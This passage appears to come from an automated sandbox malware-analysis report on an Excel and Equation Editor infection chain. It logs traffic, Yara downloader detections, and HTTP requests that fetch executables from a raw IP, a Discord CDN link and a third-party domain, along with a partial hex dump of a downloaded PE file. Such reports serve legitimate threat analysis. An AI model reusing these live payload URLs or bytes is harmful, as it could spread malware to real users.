                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 109.206.241.81:80 -> 192.168.2.22:49173
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 136.243.86.20:443
                Source: global trafficTCP traffic: 192.168.2.22:49172 -> 162.159.129.233:443
                Source: global trafficTCP traffic: 192.168.2.22:49173 -> 109.206.241.81:80
                Source: excel.exeMemory has grown: Private usage: 4MB later: 117MB

                Networking

                barindex
                Yara detected Generic Downloader
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 09:41:36 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 31 Jul 2022 13:41:30 GMTETag: "34400-5e51a0a6efe70"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
                Source: global trafficHTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pkusukoharjo.comConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknownTCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com,Rj equals www.linkedin.com (Linkedin)
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.81/htdocs/zTALg.exe
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1007008986.0000000002443000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.81P
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006721618.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
